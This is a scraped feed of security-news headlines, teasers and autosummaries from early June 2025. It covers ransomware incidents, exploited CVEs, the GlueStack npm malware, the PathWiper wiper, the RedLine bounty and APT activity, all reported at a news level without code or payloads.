⚡ Weekly Recap: Chrome 0-Day, Data Wipers, Misused Tools and Zero-Click iPhone Attacks

Linux
2025-06-09 https://thehackernews.com/2025/06/weekly-recap-chrome-0-day-data-wipers.html
Behind every security alert is a bigger story. Sometimes it’s a system being tested. Sometimes it’s trust being lost in quiet ways—through delays, odd behavior, or subtle gaps in control. This week, we’re looking beyond the surface to spot what really matters. Whether it’s poor design, hidden access, or silent misuse, knowing where to look can make all the difference. If you're responsible for

Autosummary: This week's list includes: CVE-2025-20286 (Cisco Identity Services Engine), CVE-2025-49113 (Roundcube), CVE-2025-5419 (Google Chrome), CVE-2025-21479, CVE-2025-21480, CVE-2025-27038 (Qualcomm), CVE-2025-37093 (HPE StoreOnce), CVE-2025-48866 (ModSecurity WAF), CVE-2025-25022 (IBM QRadar Suite), CVE-2025-22243 (VMware NSX Manager), CVE-2025-24364, CVE-2025-24365 (Vaultwarden), and CVE-2024-53298 (Dell PowerScale OneFS).
Also known by the aliases "dendimirror," "alinchok," "ghackihg," "makc1901," "navi_ghacking," and "bloodzz.fenix," Rudometov is believed to have fled from the Luhansk region of Ukraine, where he was born, to Krasnodar, Russia, following the Russian invasion of Ukraine in February 2022.
China Accuses Taiwan of Running 5 APT Groups with U.S. Help: China's National Computer Virus Emergency Response Center (CVERC) has accused Taiwan's Democratic Progressive Party (DPP) of sponsoring five advanced persistent threat (APT) groups to conduct cyber espionage attacks against government and public service entities, research institutions, universities, defense technology and industry entities, and foreign affairs agencies located in mainland China. The groups, overseen by Taiwan's Information, Communications and Electronic Force Command (ICEFOM), include APT-C-01 (aka Poison Vine or GreenSpot), APT-C-62 (aka Viola Tricolor), APT-C-64 (aka Anonymous 64), APT-C-65 (aka Neon Pothos), and APT-C-67 (aka Ursa). "Their primary goal is to steal and sell sensitive intelligence, including important diplomatic policies, defense technology, cutting-edge scientific achievements, and economic data, to anti-China forces abroad," CVERC claimed in a report titled Operation Futile.
According to ReliaQuest, Lumma accounted for nearly 92% of Russian Market credential log alerts in Q4 2024, putting it way ahead of its peers RedLine, StealC, Raccoon, Vidar, RisePro, and a new stealer referred to as Acreed.
"Over the past several months and years, we have observed a pattern of compliance failures, unmet improvement commitments, and the absence of tangible, measurable progress in response to publicly disclosed incident reports," Google said.
"During this period, customer endpoints remained protected, but security teams were unable to access the management console and related services, which significantly impacted their ability to manage their security operations and access important data," it said.
Intel 471, in a report last week, highlighted an increase in Android malware incorporating hidden virtual network computing (HVNC), keylogging, and remote control functionalities, and a decrease in web injects.
Threat hunters have disclosed a new malware campaign that employs cracked software or key generators for legitimate software as lures to distribute a known stealer malware called ViperSoftX, alongside other malware families such as Quasar RAT, PureCrypter, PureHVNC, and a cryptocurrency clipper.


OpenAI bans ChatGPT accounts linked to Russian, Chinese cyber ops

rusia-ucrania
2025-06-09 https://securityaffairs.com/178797/intelligence/openai-bans-chatgpt-accounts-linked-to-russian-chinese-cyber-ops.html
OpenAI banned ChatGPT accounts tied to Russian and Chinese hackers using the tool for malware, social media abuse, and U.S. satellite tech research. OpenAI banned ChatGPT accounts that were used by Russian-speaking threat actors and two Chinese nation-state actors. The blocked accounts were used to assist malware development, social media automation, and research about U.S. […]

Autosummary: The posts, shared on TikTok, X, Reddit, and Facebook, included fake engagement to simulate popularity and targeted topics like Taiwan, USAID, and activist Mahrang Baloch.


Sensata Technologies says personal data stolen by ransomware gang

exploits ransomware
2025-06-09 https://www.bleepingcomputer.com/news/security/sensata-technologies-says-personal-data-stolen-by-ransomware-gang/
Sensata Technologies is warning former and current employees it suffered a data breach after concluding an investigation into an April ransomware attack. [...]


Grocery wholesale giant United Natural Foods hit by cyberattack

ciber
2025-06-09 https://www.bleepingcomputer.com/news/security/grocery-wholesale-giant-united-natural-foods-hit-by-cyberattack/
United Natural Foods (UNFI), North America's largest publicly traded wholesale distributor, was forced to shut down some systems following a recent cyberattack. [...]

Autosummary: The Rhode Island-based company operates 53 distribution centers and delivers fresh and frozen products to over 30,000 locations across the United States and Canada, including supermarket chains, e-commerce providers, natural product superstores, independent retailers, and food service customers.


Two Distinct Botnets Exploit Wazuh Server Vulnerability to Launch Mirai-Based Attacks

exploits
2025-06-09 https://thehackernews.com/2025/06/botnet-wazuh-server-vulnerability.html
A now-patched critical security flaw in the Wazuh Server is being exploited by threat actors to drop two different Mirai botnet variants and use them to conduct distributed denial-of-service (DDoS) attacks. Akamai, which first discovered the exploitation efforts in late March 2025, said the malicious campaign targets CVE-2025-24016 (CVSS score: 9.9), an unsafe deserialization vulnerability that

Autosummary: Besides attempting to spread via FTP over port 21 and conducting telnet scanning, the botnet has been found to leverage a wide range of exploits targeting the Huawei HG532 router (CVE-2017-17215), Realtek SDK (CVE-2014-8361), and TrueOnline ZyXEL P660HN-T v1 router (CVE-2017-18368). The disclosure comes as China, India, Taiwan, Singapore, Japan, Malaysia, Hong Kong, Indonesia, South Korea, and Bangladesh have emerged as the most targeted countries in the APAC region in the first quarter of 2025, according to statistics shared by StormWall.


Over 84,000 Roundcube instances vulnerable to actively exploited flaw

exploits
2025-06-09 https://www.bleepingcomputer.com/news/security/over-84-000-roundcube-instances-vulnerable-to-actively-exploited-flaw/
Over 84,000 instances of the Roundcube webmail software are vulnerable to CVE-2025-49113, a critical remote code execution (RCE) vulnerability with a publicly available exploit. [...]


Google patched bug leaking phone numbers tied to accounts

exploits
2025-06-09 https://www.bleepingcomputer.com/news/security/google-patched-bug-leaking-phone-numbers-tied-to-accounts/
A vulnerability allowed researchers to brute-force any Google account's recovery phone number simply by knowing the target's profile name and an easily retrieved partial phone number, creating a massive risk for phishing and SIM-swapping attacks. [...]

Autosummary: (Figure: Time to brute-force phone numbers; source: BruteCat.) To start an attack against someone, their email address is required for the form, but Google has set this to hidden since last year.


Linux Foundation unveils decentralized WordPress plugin manager

Linux
2025-06-09 https://www.bleepingcomputer.com/news/technology/linux-foundation-unveils-decentralized-wordpress-plugin-manager/
A collective of former WordPress developers and contributors backed by the Linux Foundation has launched the FAIR Package Manager, a new and independent distribution system for trusted WordPress plugins and themes. [...]

Autosummary: The new platform "brings together a fragmented ecosystem by bringing together plugins from any source" and "builds security into the supply chain, including improved cryptographic security measures, enhanced browser compatibility checking, and enabling reliance on trusted source security salts."


How and where to report an online scam

financial
2025-06-09 https://www.malwarebytes.com/blog/news/2025/06/how-and-where-to-report-an-online-scam
Find out where and how victims can report online scams to prevent more victims and possibly recover funds.

Autosummary: How to report a scam varies according to the country you're in, the platforms you're using, and the outcome of the scam, so here are the most common methods you may need. In the United Kingdom: Action Fraud, report online at actionfraud.police.uk or call 0300 123 2040 (Monday to Friday, 8 am to 8 pm). In Canada: Canadian Anti-Fraud Centre (CAFC), call 1-888-495-8501 or report online.


Been scammed online? Here's what to do

financial
2025-06-09 https://www.malwarebytes.com/blog/news/2025/06/been-scammed-online-heres-what-to-do
Have you been scammed online? Here are some tips to limit the damage and follow-up steps you may find useful.

Autosummary: Gather evidence: keep all records related to the scam (emails, texts, receipts, screenshots, and any communication details). If you sent the money via payment apps (e.g. PayPal, Venmo, Cash App), contact the provider to inquire about recovery options. In the UK, for credit reports and monitoring, contact Experian, Equifax, and TransUnion UK.


DOJ moves to seize $7.74M in crypto linked to North Korean IT worker scam

financial
2025-06-09 https://securityaffairs.com/178810/cyber-crime/doj-seize-7-74m-linked-to-north-korean-it-worker-scam.html
US seeks to seize $7.74M in crypto linked to North Korean fake IT worker schemes, per a new DOJ forfeiture complaint. The DOJ filed a civil forfeiture complaint for $7.74M in crypto tied to North Korean fake IT worker schemes linked to the indictment of North Korean Foreign Trade Bank (FTB) representative Sim Hyon Sop. […]

Autosummary: In May 2024, the Justice Department unsealed charges against an Arizona woman, a Ukrainian man, and three unidentified foreign nationals accused of aiding overseas IT workers, pretending to be U.S. citizens, to infiltrate hundreds of firms in remote IT positions. Chapman faces charges of conspiracy to defraud the United States, wire fraud, bank fraud, aggravated identity theft, identity fraud, money laundering, operating an unlicensed money transmitting business, and unlawful employment of aliens. Following receipt of the laptops, and without authorization, Knoot logged on to the laptops, downloaded and installed unauthorized remote desktop applications, and accessed the victim companies’ networks, causing damage to the computers.


Colombia presidential hopeful shot in head at rally

latam
2025-06-08 https://www.bbc.com/news/articles/c9dq8yxxy8zo
The opposition senator was hit three times during a rally in Bogota and is in a critical condition in hospital.


Week in review: Google fixes exploited Chrome zero-day, Patch Tuesday forecast

exploits
2025-06-08 https://www.helpnetsecurity.com/2025/06/08/week-in-review-google-fixes-exploited-chrome-zero-day-patch-tuesday-forecast/

Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: June 2025 Patch Tuesday forecast: Second time is the charm? Microsoft has been busy releasing more out-of-band (OOB) patches than usual throughout May. Google fixes Chrome zero-day with in-the-wild exploit (CVE-2025-5419) Google has fixed two Chrome vulnerabilities, including a zero-day flaw (CVE-2025-5419) with an in-the-wild exploit. Rethinking governance in a decentralized identity world Decentralized identity (DID) is gaining traction, and … More

Autosummary: New infosec products of the week: June 6, 2025 Here’s a look at the most interesting products from the past week, featuring releases from Akamai, AttackIQ, Barracuda Networks, Bitdefender, Fortinet, Malwarebytes, and Varonis. Bankers Association’s attack on cybersecurity transparency A coalition of banking industry associations, including SIFA, the American Bankers Association (ABA), Bank Policy Institute (BPI), and several other lobbying groups have made a disgraceful appeal to the SEC to eliminate the rule requiring public disclosure of material cybersecurity incidents within four days of detection. Rethinking governance in a decentralized identity world Decentralized identity (DID) is gaining traction, and for CISOs, it’s becoming a part of long-term planning around data protection, privacy, and control.


SECURITY AFFAIRS MALWARE NEWSLETTER ROUND 48

exploits
2025-06-08 https://securityaffairs.com/178766/malware/security-affairs-malware-newsletter-round-48.html
Security Affairs Malware newsletter includes a collection of the best articles and research on malware in the international landscape:
- Pure Crypter Malware Analysis: 99 Problems but Detection Ain’t One
- Attacker exploits misconfigured AI tool to run AI-generated payload
- Crocodilus Mobile Malware: Evolving Fast, Going Global
- How Threat Actors Exploit Human Trust: A Breakdown of the […]



New Supply Chain Malware Operation Hits npm and PyPI Ecosystems, Targeting Millions Globally

exploits
2025-06-08 https://thehackernews.com/2025/06/new-supply-chain-malware-operation-hits.html
Cybersecurity researchers have flagged a supply chain attack targeting over a dozen packages associated with GlueStack to deliver malware. The malware, introduced via a change to "lib/commonjs/index.js," allows an attacker to run shell commands, take screenshots, and upload files to infected machines, Aikido Security told The Hacker News, stating these packages collectively account for nearly 1

Autosummary: Furthermore, the malicious code injected into the packages is similar to the remote access trojan that was delivered following the compromise of another npm package "rand-user-agent" last month, indicating that the same threat actors could be behind the activity. The list of the impacted packages and the affected versions is below:
- @gluestack-ui/utils version 0.1.16 (101 Downloads)
- @gluestack-ui/utils version 0.1.17 (176 Downloads)
- @react-native-aria/button version 0.2.11 (174 Downloads)
- @react-native-aria/checkbox version 0.2.11 (577 Downloads)
- @react-native-aria/combobox version 0.2.8 (167 Downloads)
- @react-native-aria/disclosure version 0.2.9 (N/A)
- […] (54 Downloads)
- @react-native-aria/overlay version 0.3.16 (751 Downloads)
- @react-native-aria/radio version 0.2.14 (570 Downloads)
- @react-native-aria/slider version 0.2.13 (264 Downloads)
- @react-native-aria/switch version 0.2.5 (56 Downloads)
- @react-native-aria/tabs version 0.2.14 (170 Downloads)
- @react-native-aria/toggle version 0.2.12 (589 Downloads)
- @react-native-aria/utils version 0.2.13 (341 Downloads)


Government considers social media time limits for children

government
2025-06-08 https://www.bbc.com/news/articles/c3d4349gdx4o
The BBC understands proposals include a two-hour cap on apps and a 22:00 curfew.



Watch: Moment Chile earthquake rocks live TV show

latam
2025-06-07 https://www.bbc.com/news/videos/cev4lzg7zeko
The 6.4 magnitude earthquake interrupted the broadcast, shaking the equipment in the studio.



Malware found in NPM packages with 1 million weekly downloads

exploits
2025-06-07 https://www.bleepingcomputer.com/news/security/supply-chain-attack-hits-gluestack-npm-packages-with-960k-weekly-downloads/
A significant supply chain attack hit NPM after 15 popular Gluestack packages with over 950,000 weekly downloads were compromised to include malicious code that acts as a remote access trojan (RAT). [...]

Autosummary: 22,000 @react-native-aria/overlays 0.3.16 96,000 @react-native-aria/radio 0.2.14 78,000 @react-native-aria/switch 0.2.5 477 @react-native-aria/toggle 0.2.12 81,000 @react-native-aria/utils


AI becomes key player in enterprise ransomware defense

exploits ransomware
2025-06-06 https://www.helpnetsecurity.com/2025/06/06/ransomware-threats-concern/

Ransomware breaches continue to rise even as fewer victims pay, according to a Delinea report. 69% of organizations globally have fallen victim to ransomware, with 27% being hit more than once. While only 57% of organizations paid ransoms, down from 76% in 2024, the frequency and impact of attacks continued to grow as threat actors turned to other tactics like extortion, with 85% of ransomware victims threatened with exposure. Paying the ransom doesn’t always bring … More


Autosummary: At the same time, defenders are increasingly relying on AI to detect and respond to threats faster, with 90% of organizations now using AI in their ransomware defense strategies – primarily within Security Operations Centres (64%), for analysing Indicators of Compromise (62%), and to prevent phishing (51%).


Why IAM should be the starting point for AI-driven cybersecurity

ciber
2025-06-06 https://www.helpnetsecurity.com/2025/06/06/benny-porat-twine-security-ai-driven-security-decisions/

In this Help Net Security interview, Benny Porat, CEO at Twine Security, discusses applying AI agents to security decisions. He explains why identity and access management (IAM) is the ideal starting point for both augmentation and automation, and shares advice on building trust in AI agents and integrating them into existing workflows.


Autosummary: High-volume, low-complexity tasks like identity hygiene, account ownership verification, and routine IAM workflows are good examples of where to start, and then move up to more complex scenarios requiring human judgment such as remediating audit findings, stale account identification and clean up, and user access reviews (UARs), where AI will help accelerate processes while still keeping humans in the loop. Now let’s go back to AI agents – unlike human decision-making that relies on memory and subjective recollection, AI agents create complete, immutable audit trails capturing every decision point, data input, logical step, and action taken throughout the entire process.


Ransomware and USB attacks are hammering OT systems

exploits
2025-06-06 https://www.helpnetsecurity.com/2025/06/06/honeywell-2025-cyber-threat-report/

Ransomware, trojans, and malware delivered through USB devices are putting growing pressure on industrial systems, according to the Honeywell 2025 Cyber Threat Report, which draws on data from monitoring tools deployed across industrial sites around the world. The findings highlight persistent and serious risks to OT environments that keep critical infrastructure running. [Figure: Findings from the Honeywell Advanced Monitoring and Incident Response (AMIR) service] The numbers aren’t great: researchers recorded a 46 percent increase in ransomware … More


Autosummary: “The rate at which the Industrials innovates has not kept in lock step and because of this, threat actors can easily repurpose known exploits and easily target industrial customers knowing that these facilities and equipment are 10 to 20 years old and patching schedules are typically sub par,” Paul Smith, director of Honeywell OT Cybersecurity Engineering, told Help Net Security. Worms like W32.Ramnit, a credential-stealing trojan originally tied to banking fraud, showed up in industrial networks with a 3,000 percent increase in detections.


Play ransomware group hit 900 organizations since 2022

exploits ransomware
2025-06-06 https://securityaffairs.com/178702/cyber-crime/play-ransomware-group-hit-900-organizations-since-2022.html
A joint advisory from the US and Australian authorities states that Play ransomware has hit approximately 900 organizations over the past three years. A joint advisory from the Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and Australian Signals Directorate’s Australian Cyber Security Centre (ASD’s ACSC) states that Play ransomware has hit […]

Autosummary: “The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and Australian Signals Directorate’s Australian Cyber Security Centre (ASD’s ACSC) are releasing this joint advisory to disseminate the Play ransomware group’s IOCs and TTPs identified through FBI investigations as recently as January 2025,” reads the advisory.


New PathWiper Data Wiper Malware Disrupts Ukrainian Critical Infrastructure in 2025 Attack

exploits
2025-06-06 https://thehackernews.com/2025/06/new-pathwiper-data-wiper-malware.html
A critical infrastructure entity within Ukraine was targeted by a previously unseen data wiper malware named PathWiper, according to new findings from Cisco Talos. "The attack was instrumented via a legitimate endpoint administration framework, indicating that the attackers likely had access to the administrative console, that was then used to issue malicious commands and deploy PathWiper across

Autosummary: Specifically, it targets: Master Boot Record (MBR), $MFT, $MFTMirr, $LogFile, $Boot, $Bitmap, $TxfLog, $Tops, and $AttrDef. Pro-Ukrainian Hacktivist Group BO Team Targets Russia: In recent months, Russian state-owned companies and organizations spanning technology, telecommunications, and production verticals are also said to have come under cyber assaults from a pro-Ukrainian hacktivist group codenamed BO Team (aka Black Owl, Hoody Hyena, and Lifting Zmiy). Some of the other activities carried out by the threat actor are listed below:
- Setting up persistence using scheduled tasks
- Assigning malicious component names similar to system or well-known executable files to evade detection
- Extracting the Active Directory database using ntdsutil
- Running various commands to collect information about Telegram, running processes, current users, remote RDP sessions, and antivirus software installed on the endpoints
- Using RDP and SSH protocols to perform lateral movement within Windows and Linux infrastructures
- Dropping legitimate remote access software like AnyDesk for command-and-control
"The BO Team group poses a significant threat to Russian organizations due to its unconventional approach to conducting attacks," Kaspersky said.


U.S. Offers $10M bounty for info on RedLine malware creator and state hackers

exploits government
2025-06-06 https://securityaffairs.com/178712/cyber-crime/u-s-offers-10m-bounty-for-info-on-redline-malware-creator-and-state-hackers.html
The U.S. offers up to $10M for info on state hackers linked to RedLine malware and its creator, Maxim Rudometov, tied to attacks on U.S. infrastructure. The U.S. Department of State offers a reward of up to $10 million for information on nation-state actors linked to the RedLine infostealer and its alleged author, Russian national Maxim […]

Autosummary: Law enforcement agencies involved: Australian Federal Police; The Netherlands: National Police, Team Cybercrime Limburg, Public Prosecution Service; United States: Federal Bureau of Investigation, Naval Criminal Investigative Service, Internal Revenue Service Criminal Investigations, Department of Defense Criminal Investigative Service, Army Criminal Investigation Division; Belgium: Federal Prosecutor’s Office, Federal Police; Portugal: Polícia Judiciária; United Kingdom: National Crime Agency. Cybersecurity firm ESET also supported international law enforcement operations. “Anyone with information on foreign government linked associates of Rudometov, or their malicious cyber activities, or foreign government-linked use of RedLine malware, should contact Rewards for Justice via the Tor-based tips-reporting channel at: he5dybnt7sr6cm32xt77pazmtm65flqy6irivtflruqfc5ep7eiodiad.onion (Tor browser required),” continues the announcement. (Article by Pierluigi Paganini, June 06, 2025.)


NatWest apologises as banking app goes offline

financial
2025-06-06 https://www.bbc.com/news/articles/c4gry29g30qo
More than 3,000 people have reported problems during what is the latest in a long line of banking IT failures.

Autosummary: NatWest has advised customers on social media that it has "no timeframe" for a fix, but said its team is "working hard" to resolve it.


Kettering Health confirms Interlock ransomware behind cyberattack

exploits ransomware ciber
2025-06-06 https://www.bleepingcomputer.com/news/security/kettering-health-confirms-interlock-ransomware-behind-cyberattack/
Healthcare giant Kettering Health, which manages 14 medical centers in Ohio, confirmed that the Interlock ransomware group breached its network and stole data in a May cyberattack. [...]



New PathWiper data wiper malware hits critical infrastructure in Ukraine

exploits
2025-06-06 https://www.bleepingcomputer.com/news/security/new-pathwiper-data-wiper-malware-hits-critical-infrastructure-in-ukraine/
A new data wiper malware named "PathWiper" is being used in targeted attacks against critical infrastructure in Ukraine, aimed at disrupting operations in the country. [...]

Autosummary: This includes wipers named DoubleZero, CaddyWiper, HermeticWiper, IsaacWiper, WhisperKill, WhisperGate, and AcidRain.


Critical Fortinet flaws now exploited in Qilin ransomware attacks

exploits ransomware
2025-06-06 https://www.bleepingcomputer.com/news/security/critical-fortinet-flaws-now-exploited-in-qilin-ransomware-attacks/
The Qilin ransomware operation has recently joined attacks exploiting two Fortinet vulnerabilities that allow bypassing authentication on vulnerable devices and executing malicious code remotely. [...]

Autosummary: For instance, in February, Fortinet disclosed that the Chinese Volt Typhoon hacking group used two FortiOS SSL VPN flaws (CVE-2022-42475 and CVE-2023-27997) to deploy the Coathanger custom remote access trojan (RAT) malware, which had been previously used to backdoor a Dutch Ministry of Defence military network.


Booking.com reservation abused as cybercriminals steal from travelers

ciber
2025-06-06 https://www.malwarebytes.com/blog/news/2025/06/booking-com-abused-by-cybercriminals-to-steal-from-travelers
Cybercriminals are abusing the hospitality industry and its booking platforms to defraud the travelers that visit them.

Autosummary: Arcona Hotels & Resorts is a German-based company specializing in operating and developing hotels, particularly focusing on leisure and holiday hotels, boutique hotels, and 5-star properties. To be clear, these types of online scams are so effective because the hotel itself has been compromised, and travelers log into official, verified websites and services only to receive malicious messages from cybercriminals who are secretly in control.


Marks & Spencer’s ransomware nightmare – more details emerge

exploits ransomware
2025-06-06 https://www.bitdefender.com/en-us/blog/hotforsecurity/marks-spencers-ransomware-nightmare-more-details-emerge
Over Easter, retail giant Marks & Spencer (M&S) discovered that it had suffered a highly damaging ransomware attack that left some shop shelves empty, shut down online ordering, some staff unable to clock in and out, and caused some of its major suppliers to resort to pen and paper. In a gloating abuse-filled email to M&S CEO Stuart Machin, the DragonForce hacker group claimed responsibility for the attack. Read more in my article on the Hot for Security blog.



US offers $10 million reward for tips about state-linked RedLine hackers

government
2025-06-06 https://www.tripwire.com/state-of-security/us-offers-10-million-reward-tips-about-state-linked-redline-cybercriminals
How would you like to earn yourself millions of dollars? Well, it may just be possible - if you have information which could help expose the identities of cybercriminals involved with the notorious RedLine information-stealing malware. Read more in my article on the Tripwire State of Security blog.



Microsoft Helps CBI Dismantle Indian Call Centers Behind Japanese Tech Support Scam

financial
2025-06-06 https://thehackernews.com/2025/06/microsoft-helps-cbi-dismantle-indian.html
India"s Central Bureau of Investigation (CBI) has revealed that it has arrested four individuals and dismantled two illegal call centers that were found to be engaging in a sophisticated transnational tech support scam targeting Japanese citizens. The law enforcement agency said it conducted coordinated searches at 19 locations across Delhi, Haryana, and Uttar Pradesh on May 28, 2025, as part of "

Autosummary: The cross-sector collaboration, Redmond added, made it possible to identify the broader network behind these operations, which includes pop-up creators, search-engine optimizers, lead generators, logistics and technology providers, payment processors, and talent providers.


Tax resolution firm Optima Tax Relief hit by ransomware, data leaked

exploits ransomware
2025-06-06 https://www.bleepingcomputer.com/news/security/tax-resolution-firm-optima-tax-relief-hit-by-ransomware-data-leaked/
U.S. tax resolution firm Optima Tax Relief suffered a Chaos ransomware attack, with the threat actors now leaking data stolen from the company. [...]



New Atomic macOS Stealer Campaign Exploits ClickFix to Target Apple Users

exploits
2025-06-06 https://thehackernews.com/2025/06/new-atomic-macos-stealer-campaign.html
Cybersecurity researchers are alerting to a new malware campaign that employs the ClickFix social engineering tactic to trick users into downloading an information stealer malware known as Atomic macOS Stealer (AMOS) on Apple macOS systems. The campaign, according to CloudSEK, has been found to leverage typosquat domains mimicking U.S.-based telecom provider Spectrum. "macOS users are served a

Autosummary: However, when the user clicks the "I am human" checkbox for evaluation, they are displayed an error message stating "CAPTCHA verification failed," urging them to click a button to go ahead with an "Alternative Verification."


Attackers exploit Fortinet flaws to deploy Qilin ransomware

exploits ransomware
2025-06-06 https://securityaffairs.com/178736/hacking/attackers-exploit-fortinet-flaws-to-deploy-qilin-ransomware.html
Qilin ransomware now exploits Fortinet vulnerabilities to achieve remote code execution on impacted devices. Threat intelligence firm PRODAFT warned that the Qilin ransomware (aka Phantom Mantis) group targeted multiple organizations between May and June 2025 by exploiting multiple FortiGate vulnerabilities, including CVE-2024-21762 and CVE-2024-55591. “Phantom Mantis recently launched a coordinated intrusion campaign targeting multiple organizations between […]

Autosummary: However, while Mora_001 is tracked as an independent threat actor, it exhibits consistent post-exploitation tactics, including identical usernames across victims, overlapping IPs, and rapid ransomware deployment within 48 hours.


Interlock ransomware claims Kettering Health breach, leaks stolen data

exploits ransomware
2025-06-05 https://www.bleepingcomputer.com/news/security/interlock-ransomware-claims-kettering-health-breach-leaks-stolen-data/
The Interlock ransomware gang has claimed a recent cyberattack on the Kettering Health healthcare network and leaked data allegedly stolen from breached systems. [...]



US offers $10M for tips on state hackers tied to RedLine malware

exploits government
2025-06-05 https://www.bleepingcomputer.com/news/security/us-offers-10m-for-tips-on-state-hackers-tied-to-redline-malware/
The U.S. Department of State has announced a reward of up to $10 million for any information on government-sponsored hackers with ties to the RedLine infostealer malware operation and its suspected creator, Russian national Maxim Alexandrovich Rudometov. [...]



Google survey shows Americans are changing how they fight scams

financial
2025-06-05 https://www.helpnetsecurity.com/2025/06/05/google-survey-fight-scams/

If it seems like scams are popping up everywhere lately, you’re not wrong. A new survey from Google shows most Americans feel the same, and they’re starting to change how they handle things online because of it. But different age groups are responding in different ways, and the tools people trust to stay safe vary more than you might expect. In a new blog post, Evan Kotsovinos, Google’s VP of Privacy, Safety and Security, breaks … More


Autosummary: Kotsovinos said, “Most people, including Generation X, Baby Boomers and many Millennials, still rely on older sign in methods like passwords and 2FA, with about half of all Americans admitting to writing down or memorizing their passwords.”


Ransomware hiding in fake AI, business tools

exploits
2025-06-05 https://www.malwarebytes.com/blog/business/2025/06/ransomware-hiding-in-fake-ai-business-tools
Ransomware has been discovered by security researchers in fake installers posing as Chat GPT, Nova Leads, and InVideo AI.

Autosummary: This method, called “SEO poisoning,” is deployed by scammers, hackers, and shady websites.


Iran-Linked BladedFeline Hits Iraqi and Kurdish Targets with Whisper and Spearal Malware

exploits
2025-06-05 https://thehackernews.com/2025/06/iran-linked-bladedfeline-hits-iraqi-and.html
An Iran-aligned hacking group has been attributed to a new set of cyber attacks targeting Kurdish and Iraqi government officials in early 2024. The activity is tied to a threat group ESET tracks as BladedFeline, which is assessed with medium confidence to be a sub-cluster within OilRig, a known Iranian nation-state cyber actor. It’s said to be active since September 2017, when it targeted

Autosummary: Then last November, the cybersecurity firm said it observed the hacking crew orchestrating attacks against Iran’s neighbors, particularly regional and government entities in Iraq and diplomatic envoys from Iraq to various countries, using bespoke backdoors like Whisper (aka Veaty), Spearal, and Optimizer.


Researchers Detail Bitter APT’s Evolving Tactics as Its Geographic Scope Expands

industry
2025-06-05 https://thehackernews.com/2025/06/bitter-hacker-group-expands-cyber.html
The threat actor known as Bitter has been assessed to be a state-backed hacking group that’s tasked with gathering intelligence that aligns with the interests of the Indian government. That’s according to new findings jointly published by Proofpoint and Threatray in an exhaustive two-part analysis. "Their diverse toolset shows consistent coding patterns across malware families, particularly in

Autosummary: Bitter"s Malware Families Some of the other known tools in its arsenal are below - ArtraDownloader , a downloader written in C++ that collects system information and uses HTTP requests to download and execute a remote file , a downloader written in C++ that collects system information and uses HTTP requests to download and execute a remote file Keylogger , a C++ module used in various campaigns to record keystrokes and clipboard content , a C++ module used in various campaigns to record keystrokes and clipboard content WSCSPL Backdoor , a backdoor that"s delivered via ArtraDownloader and supports commands to get machine information, execute remote instructions, and download and run files , a backdoor that"s delivered via ArtraDownloader and supports commands to get machine information, execute remote instructions, and download and run files MuuyDownloader (aka ZxxZ), a trojan that allows remote code execution of payloads received from a remote server (aka ZxxZ), a trojan that allows remote code execution of payloads received from a remote server Almond RAT , a .NET trojan that offers basic data gathering functionality and the ability to execute arbitrary commands and transfer files , a .NET trojan that offers basic data gathering functionality and the ability to execute arbitrary commands and transfer files ORPCBackdoor , a backdoor that uses the RPC protocol to communicate with a command-and-control (C2) server and runs operator-issued instructions , a backdoor that uses the RPC protocol to communicate with a command-and-control (C2) server and runs operator-issued instructions KiwiStealer , a stealer that searches for files matching a predefined set of extensions, are smaller than 50 MB, and have been modified within the past year, and exfiltrates them to a remote server , a stealer that searches for files matching a predefined set of extensions, are smaller than 50 MB, and have been modified within the past year, and exfiltrates them to a remote 
server KugelBlitz, a shellcode loader that"s used to deploy the Havoc C2 framework It"s worth noting that ORPCBackdoor has been attributed by the Knownsec 404 Team to a threat actor called Mysterious Elephant, which it said overlaps with other India-aligned threat clusters, including SideWinder, Patchwork, Confucius, and Bitter. "


Hacker selling critical Roundcube webmail exploit as tech info disclosed

exploits
2025-06-05 https://www.bleepingcomputer.com/news/security/hacker-selling-critical-roundcube-webmail-exploit-as-tech-info-disclosed/
Hackers are actively exploiting CVE-2025-49113, a critical vulnerability in the widely used Roundcube open-source webmail application that allows remote execution. [...]

Autosummary: “Given the active exploitation and evidence of the exploit being sold in underground forums, I believe it is in the best interest of defenders, blue teams, and the broader security community to publish a full technical breakdown but without complete PoC for now” - Kirill Firsov. At the root of the security problem is the lack of sanitization of the $_GET['_from'] parameter, which leads to PHP Object deserialization.


FBI: BADBOX 2.0 Android malware infects millions of consumer devices

exploits
2025-06-05 https://www.bleepingcomputer.com/news/security/fbi-badbox-20-android-malware-infects-millions-of-consumer-devices/
The FBI is warning that the BADBOX 2.0 malware campaign has infected over 1 million home Internet-connected devices, converting consumer electronics into residential proxies that are used for malicious activity. [...]

Autosummary: "Devices connected to the BADBOX 2.0 operation included lower-price-point, 'off brand', uncertified tablets, connected TV (CTV) boxes, digital projectors, and more," explains HUMAN. [Figure: BADBOX 2.0 Global Distribution. Source: HUMAN Satori] In a joint operation led by HUMAN’s Satori team and Google, Trend Micro, The Shadowserver Foundation, and other partners, the BADBOX 2.0 botnet was disrupted again to prevent over 500,000 infected devices from communicating with the attacker’s servers.


U.S. CISA adds Google Chromium V8 flaw to its Known Exploited Vulnerabilities catalog

exploits
2025-06-05 https://securityaffairs.com/178678/security/u-s-cisa-google-chromium-v8-flaw-known-exploited-vulnerabilities-catalog.html
U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds a Google Chromium V8 vulnerability to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added Google Chromium V8 Out-of-Bounds Read and Write Vulnerability, tracked as CVE-2025-5419, to its Known Exploited Vulnerabilities (KEV) catalog. This week, Google released out-of-band updates to address three vulnerabilities […]



New versions of Chaos RAT target Windows and Linux systems

Linux
2025-06-05 https://securityaffairs.com/178670/malware/new-versions-of-chaos-rat-target-windows-and-linux-systems.html
Acronis researchers reported that new Chaos RAT variants were employed in 2025 attacks against Linux and Windows systems. Acronis TRU researchers discovered new Chaos RAT variants targeting Linux and Windows in recent attacks. Originally seen in 2022, Chaos RAT evolved in 2024, with fresh samples emerging in 2025. TRU also discovered a critical flaw in […]

Autosummary: It can gather OS and user info, take screenshots, reboot or shut down the system, lock or sign out users (Windows only), browse and manage files (explore, upload, download, delete), and open URLs in the default browser. Chaos RAT enables attackers to manage files, open reverse shells, and proxy network traffic, which are functions useful for spying, stealing data, or setting the stage for ransomware.


How to build a robust Windows service to block malware and ransomware

